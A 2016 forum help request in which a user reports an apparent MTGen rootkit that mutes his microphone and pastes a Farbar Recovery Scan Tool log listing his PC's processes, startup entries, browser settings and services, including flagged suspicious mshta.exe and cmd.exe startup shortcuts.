Think it is MTGen infection - Microphone mutes


This topic is locked
27 replies to this topic

#1 Gregbc1976 (Members, 19 posts)

Posted 08 August 2016 - 10:19 AM

 

I need help in removing this virus. It keeps muting the microphone, which is the only symptom I can see.

I have tried the following:

Ran Malwarebytes full scan
            Found rootkits (MTGen) – deleted
Rebooted; problem persists
Ran Malwarebytes rootkit and startup files scan
            Found rootkits – deleted
            DID NOT reboot
            Ran scan again
                        No rootkits found
Ran HitmanPro
            Nothing found
Scan with RogueKiller
    Just found PUPs – deleted them
Rootkit deep scan with Spybot
        Nothing
Running AdwCleaner
    Found nothing

SUNDAY

Ran Malwarebytes – rootkit found

If I use Task Manager to kill regsvr32.exe (multiple instances), the microphone problem goes away but reappears on reboot. I suspect, but cannot confirm, that mshta.exe launches those instances.

I ran FRST the first time NOT as administrator. I deleted those files and reran it as administrator. The following is the FRST.txt from that scan, and I am attaching the Addition.txt from that run.

Thanks in advance for your help

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 03-08-2016
Ran by Greg Main Acct (administrator) on GREG-HP (08-08-2016 10:49:19)
Running from C:\Users\Greg\Desktop
Loaded Profiles: Greg & Greg Main Acct (Available Profiles: Greg & Greg Main Acct & DefaultAppPool)
Platform: Windows 10 Home Version 1511 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Edge)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Symantec Corporation) C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe
(Andrea Electronics Corporation) C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
(Microsoft Corporation) C:\Windows\System32\mqsvc.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\tv_w32.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\tv_x64.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Microsoft Corporation) C:\Program Files\Microsoft IntelliPoint\ipoint.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Hewlett-Packard Co.) C:\Program Files\HP\HP Deskjet 3510 series\Bin\ScanToPCActivationApp.exe
(Hewlett-Packard Co.) C:\Program Files\HP\HP Officejet Pro 8610\Bin\ScanToPCActivationApp.exe
(Hewlett-Packard Co.) C:\Program Files\HP\HP Officejet Pro 8610\Bin\HPNetworkCommunicatorCom.exe
(Skype Technologies S.A.) C:\Program Files (x86)\Skype\Phone\Skype.exe
(Hewlett-Packard Co.) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
(ArcSoft, Inc.) C:\Program Files (x86)\ArcSoft\TotalMedia Backup & Record\uBBMonitor.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe
(Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\avastui.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe
() C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\SkypeHost.exe
(Hewlett-Packard Company) C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPWA_Service.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe
(Hewlett-Packard Company) C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPWA_Main.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Realtek Semiconductor Corp.) C:\Program Files\Realtek\RtVOsd\RtVOsdService.exe
(Realtek Semiconductor Corp.) C:\Program Files\Realtek\RtVOsd\RtVOsd.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\OFFICE11\WINWORD.EXE
(Microsoft Corporation) C:\Windows\splwow64.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Desktop.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Program Files (x86)\Windows Live\Mail\wlmail.exe
(Microsoft Corporation) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Adobe Systems Incorporated) C:\Windows\System32\Macromed\Flash\FlashUtil_ActiveX.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [HPWirelessAssistant] => C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPWA_Main.exe [363064 2010-06-18] (Hewlett-Packard Company)
HKLM\...\Run: [IntelliPoint] => c:\Program Files\Microsoft IntelliPoint\ipoint.exe [2327952 2010-07-21] (Microsoft Corporation)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [3954352 2016-03-30] (Synaptics Incorporated)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8505088 2015-07-03] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1402624 2015-07-03] (Realtek Semiconductor)
HKLM-x32\...\Run: [IAStorIcon] => C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [284696 2010-04-13] (Intel Corporation)
HKLM-x32\...\Run: [HP Quick Launch] => C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe [577408 2012-02-15] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe [96056 2013-05-30] (Hewlett-Packard)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvastUI.exe [8900328 2016-07-11] (AVAST Software)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [595992 2016-05-20] (Oracle Corporation)
HKLM-x32\...\Run: [SDTray] => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe [4101576 2014-06-24] (Safer-Networking Ltd.)
HKLM\...\RunOnce: [InstallSmbDrv] => C:\Program Files\Synaptics\SynTP\dpinst.exe [1065656 2016-03-30] (Microsoft Corporation)
HKLM\...\RunOnce: [*Restore] => C:\WINDOWS\System32\rstrui.exe [269824 2015-10-30] (Microsoft Corporation)
HKLM-x32\...\RunOnce: [Malwarebytes Anti-Malware (cleanup)] => C:\ProgramData\Malwarebytes\Malwarebytes Anti-Malware\mbamdor.exe [55264 2016-03-10] (Malwarebytes)
HKLM-x32\...\RunOnce: [RealtekHDAUpgrade] => RealtekHDAUpgrade
Winlogon\Notify\igfxcui: C:\WINDOWS\system32\igfxdev.dll (Intel Corporation)
Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
HKU\S-1-5-21-56867686-1103405722-4171089578-1000\...\Run: [Fitbit Connect] => "C:\Program Files (x86)\Fitbit Connect\Fitbit Connect.exe" /autorun
HKU\S-1-5-21-56867686-1103405722-4171089578-1000\...\Run: [HP Deskjet 3510 series (NET)] => C:\Program Files\HP\HP Deskjet 3510 series\Bin\ScanToPCActivationApp.exe [2573416 2012-10-17] (Hewlett-Packard Co.)
HKU\S-1-5-21-56867686-1103405722-4171089578-1000\...\Run: [GarminExpressTrayApp] => C:\Program Files (x86)\Garmin\Express Tray\ExpressTray.exe [1400232 2016-07-31] (Garmin Ltd. or its subsidiaries)
HKU\S-1-5-21-56867686-1103405722-4171089578-1000\...\Run: [HP Officejet Pro 8610 (NET)] => C:\Program Files\HP\HP Officejet Pro 8610\Bin\ScanToPCActivationApp.exe [3487240 2014-03-06] (Hewlett-Packard Co.)
HKU\S-1-5-21-56867686-1103405722-4171089578-1000\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [29494400 2016-07-13] (Skype Technologies S.A.)
HKU\S-1-5-21-56867686-1103405722-4171089578-1000\...\Run: [SpybotPostWindows10UpgradeReInstall] => C:\Program Files\Common Files\AV\Spybot - Search and Destroy\Test.exe [1011200 2015-07-28] (Safer-Networking Ltd.)
HKU\S-1-5-21-56867686-1103405722-4171089578-1000\...\Run: [**cfdcc<*>] => "C:\Users\Greg\AppData\Local\a82409\63a99d.lnk" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-56867686-1103405722-4171089578-1004\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8891608 2016-07-13] (Piriform Ltd)
HKU\S-1-5-18\...\Run: [GarminExpressTrayApp] => C:\Program Files (x86)\Garmin\Express Tray\ExpressTray.exe [1400232 2016-07-31] (Garmin Ltd. or its subsidiaries)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2016-06-29] (AVAST Software)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HP Digital Imaging Monitor.lnk [2010-12-07]
ShortcutTarget: HP Digital Imaging Monitor.lnk -> C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe (Hewlett-Packard Co.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\TotalMedia Backup Monitor.lnk [2010-12-07]
ShortcutTarget: TotalMedia Backup Monitor.lnk -> C:\Program Files (x86)\ArcSoft\TotalMedia Backup & Record\uBBMonitor.exe (ArcSoft, Inc.)
Startup: C:\Users\Greg\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\88ab92.lnk [2016-08-06]
ShortcutTarget: 88ab92.lnk -> C:\Windows\System32\mshta.exe (Microsoft Corporation)
Startup: C:\Users\Greg\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\df1157.lnk [2016-08-06]
ShortcutTarget: df1157.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
GroupPolicyScripts-x32: Restriction <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{e854f879-33ce-46f0-9584-47fe8baf283b}: [DhcpNameServer] 192.168.1.254

Internet Explorer:
==================
HKU\S-1-5-21-56867686-1103405722-4171089578-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.yahoo.com/
HKU\S-1-5-21-56867686-1103405722-4171089578-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.msn.com/HPNOT/1
HKU\S-1-5-21-56867686-1103405722-4171089578-1004\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.yahoo.com/?fr=yset_ie_syc_oracle&type=orcl_hpset
SearchScopes: HKLM -> DefaultScope {FF3A0FF3-A7B5-4548-8C19-93320C6929AE} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKLM -> {22CF8A8F-0D17-4F36-9BB2-6804D765747E} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPNTDF
SearchScopes: HKLM -> {8AC493D3-A2F5-487B-90C4-0C31D4535FCA} URL = hxxp://en.wikipedia.org/wiki/Special:Search?search={searchTerms}
SearchScopes: HKLM -> {FF3A0FF3-A7B5-4548-8C19-93320C6929AE} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKLM-x32 -> DefaultScope {FF3A0FF3-A7B5-4548-8C19-93320C6929AE} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKLM-x32 -> {22CF8A8F-0D17-4F36-9BB2-6804D765747E} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPNTDF
SearchScopes: HKLM-x32 -> {8AC493D3-A2F5-487B-90C4-0C31D4535FCA} URL = hxxp://en.wikipedia.org/wiki/Special:Search?search={searchTerms}
SearchScopes: HKLM-x32 -> {FF3A0FF3-A7B5-4548-8C19-93320C6929AE} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-56867686-1103405722-4171089578-1000 -> {22CF8A8F-0D17-4F36-9BB2-6804D765747E} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPNTDF
SearchScopes: HKU\S-1-5-21-56867686-1103405722-4171089578-1000 -> {6711EAD0-4559-4EF9-B1E5-90F02A56A0F8} URL =
SearchScopes: HKU\S-1-5-21-56867686-1103405722-4171089578-1000 -> {8AC493D3-A2F5-487B-90C4-0C31D4535FCA} URL = hxxp://en.wikipedia.org/wiki/Special:Search?search={searchTerms}
SearchScopes: HKU\S-1-5-21-56867686-1103405722-4171089578-1000 -> {FF3A0FF3-A7B5-4548-8C19-93320C6929AE} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-56867686-1103405722-4171089578-1004 -> {8DB27708-90D0-4C7E-A57A-2DBFE4021597} URL = hxxps://search.yahoo.com/search?p={searchTerms}&fr=yset_ie_syc_oracle&type=orcl_default
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_91\bin\ssv.dll [2016-06-10] (Oracle Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_91\bin\jp2ssv.dll [2016-06-10] (Oracle Corporation)
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll => No File
BHO-x32: HP Print Enhancer -> {0347C33E-8762-4905-BF09-768834316C61} -> C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\hpswp_printenhancer.dll [2010-05-28] (Hewlett-Packard Co.)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_91\bin\ssv.dll [2016-06-10] (Oracle Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_91\bin\jp2ssv.dll [2016-06-10] (Oracle Corporation)
BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2015-10-19] (Hewlett-Packard Company)
BHO-x32: HP Smart BHO Class -> {FFFFFFFF-CF4E-4F2B-BDC2-0E72E116A856} -> C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\hpswp_BHO.dll [2010-05-28] (Hewlett-Packard Co.)
DPF: HKLM-x32 {E2883E8F-472F-4FB0-9522-AC9BF37916A7} hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
DPF: HKLM-x32 {FD0B6769-6490-4A91-AA0A-B5AE0DC75AC9} hxxps://secure.logmein.com/activex/ractrl.cab?lmi=722
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll [2016-02-01] (Skype Technologies)

FireFox:
========
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_22_0_0_209.dll [2016-07-13] ()
FF Plugin: @java.com/DTPlugin,version=11.91.2 -> C:\Program Files\Java\jre1.8.0_91\bin\dtplugin\npDeployJava1.dll [2016-06-10] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.91.2 -> C:\Program Files\Java\jre1.8.0_91\bin\plugin2\npjp2.dll [2016-06-10] (Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50428.0\npctrl.dll [2016-04-27] ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_22_0_0_209.dll [2016-07-13] ()
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw.dll [2010-05-05] (Adobe Systems, Inc.)
FF Plugin-x32: @java.com/DTPlugin,version=11.91.2 -> C:\Program Files (x86)\Java\jre1.8.0_91\bin\dtplugin\npDeployJava1.dll [2016-06-10] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.91.2 -> C:\Program Files (x86)\Java\jre1.8.0_91\bin\plugin2\npjp2.dll [2016-06-10] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50428.0\npctrl.dll [2016-04-27] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-28] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-28] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.4 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2016-06-01] (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2016-06-30] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-56867686-1103405722-4171089578-1000: @citrixonline.com/appdetectorplugin -> C:\Users\Greg\AppData\Local\Citrix\Plugins\104\npappdetector.dll [2015-06-15] (Citrix Online)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npnul32.dll [2010-12-03] (mozilla.org)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll [2016-06-30] (Adobe Systems Inc.)
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\searchplugins\answers.xml [2010-12-03]
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\searchplugins\avg_igeared.xml [2011-05-30]
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\searchplugins\creativecommons.xml [2010-12-03]
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\avg-secure-search.xml [2014-08-26]
FF Extension: Java Console - C:\Program Files (x86)\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0023-ABCDEFFEDCBA} [2011-01-24] [not signed]
FF Extension: Java Console - C:\Program Files (x86)\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0033-ABCDEFFEDCBA} [2012-06-14] [not signed]
FF HKLM\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF
FF Extension: Avast Online Security - C:\Program Files\AVAST Software\Avast\WebRep\FF [2016-07-25]
FF HKLM\...\Firefox\Extensions: [sp@avast.com] - C:\Program Files\AVAST Software\Avast\SafePrice\FF
FF Extension: Avast SafePrice - C:\Program Files\AVAST Software\Avast\SafePrice\FF [2016-07-25]
FF HKLM-x32\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3
FF Extension: HP Smart Web Printing - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3 [2010-12-07] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [quickprint@hp.com] - C:\Program Files (x86)\Hewlett-Packard\SmartPrint\QPExtension
FF Extension: HP Smart Print - C:\Program Files (x86)\Hewlett-Packard\SmartPrint\QPExtension [2013-02-06] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF
FF HKLM-x32\...\Firefox\Extensions: [sp@avast.com] - C:\Program Files\AVAST Software\Avast\SafePrice\FF
FF HKU\S-1-5-21-56867686-1103405722-4171089578-1000\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\defaults\pref\firefox-branding.js [2010-12-03]
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\defaults\pref\firefox-l10n.js [2010-12-03]
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\defaults\pref\firefox.js [2010-12-03]
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\defaults\pref\reporter.js [2010-12-03]

Chrome:
=======
CHR HomePage: Default -> hxxp://www.google.com/
CHR StartupUrls: Default -> "hxxp://www.google.com/"
CHR DefaultSearchURL: Default -> hxxps://search.yahoo.com/search?p={searchTerms}&fr=yset_chr_syc_oracle&type=default
CHR DefaultSearchKeyword: Default -> Yahoo
CHR DefaultSuggestURL: Default -> hxxps://search.yahoo.com/sugg/ie?output=fxjson&command={searchTerms}&nResults=10
CHR Profile: C:\Users\Greg Main Acct\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Slides) - C:\Users\Greg Main Acct\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2016-02-07]
CHR Extension: (Google Docs) - C:\Users\Greg Main Acct\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-02-07]
CHR Extension: (Google Drive) - C:\Users\Greg Main Acct\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-02-07]
CHR Extension: (Yahoo Partner) - C:\Users\Greg Main Acct\AppData\Local\Google\Chrome\User Data\Default\Extensions\bhfhojbhbnajajgihpicejdalbjlpcep [2016-08-05]
CHR Extension: (YouTube) - C:\Users\Greg Main Acct\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-02-07]
CHR Extension: (Google Search) - C:\Users\Greg Main Acct\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-02-07]
CHR Extension: (Google Sheets) - C:\Users\Greg Main Acct\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2016-02-07]
CHR Extension: (Google Docs Offline) - C:\Users\Greg Main Acct\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-08-05]
CHR Extension: (Avast Online Security) - C:\Users\Greg Main Acct\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki [2016-08-05]
CHR Extension: (Skype) - C:\Users\Greg Main Acct\AppData\Local\Google\Chrome\User Data\Default\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl [2016-08-05]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Greg Main Acct\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-08-05]
CHR Extension: (Gmail) - C:\Users\Greg Main Acct\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-02-07]
CHR HKLM-x32\...\Chrome\Extension: [bhfhojbhbnajajgihpicejdalbjlpcep] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx [2016-06-10]
CHR HKLM-x32\...\Chrome\Extension: [jfmjfhklogoienhpfnppmbcbjfjnkonk] - <no Path/update_url>

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [197128 2016-06-29] (AVAST Software)
S2 Garmin Device Interaction Service; C:\Program Files (x86)\Garmin\Device Interaction Service\GarminService.exe [809488 2016-07-31] (Garmin Ltd. or its subsidiaries)
R2 HPSLPSVC; C:\Program Files (x86)\HP\Digital Imaging\bin\HPSLPSVC64.DLL [1039360 2010-10-22] (Hewlett-Packard Co.) [File not signed]
R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [25800 2015-09-28] (Hewlett-Packard Company)
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2009-05-14] (Hewlett-Packard) [File not signed]
S3 Netlogon; C:\WINDOWS\SysWOW64\netlogon.dll [713728 2016-02-23] () [File not signed]
R2 NOBU; C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe [2804568 2010-06-01] (Symantec Corporation)
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [89600 2009-05-14] (Hewlett-Packard) [File not signed]
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [303360 2015-07-03] (Realtek Semiconductor)
R2 RtVOsdService; C:\Program Files\Realtek\RtVOsd\RtVOsdService.exe [315392 2010-06-24] (Realtek Semiconductor Corp.) [File not signed]
R2 SDScannerService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [1738168 2014-06-24] (Safer-Networking Ltd.)
R2 SDUpdateService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [2088408 2014-06-27] (Safer-Networking Ltd.)
R2 SDWSCService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [171928 2014-04-25] (Safer-Networking Ltd.)
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [253960 2016-03-30] (Synaptics Incorporated)
